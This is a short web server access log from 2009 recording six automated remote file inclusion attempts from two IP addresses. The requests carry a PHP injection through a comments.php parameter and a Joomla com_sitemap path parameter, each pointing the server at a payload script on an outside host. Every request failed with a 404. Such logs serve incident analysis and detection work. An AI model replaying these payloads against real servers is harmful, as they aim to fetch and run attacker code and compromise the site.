122.153.32.10 - - [18/Oct/2009:03:04:19 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:04:19 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:04:19 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:04:28 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:04:28 -0400] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:04:28 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
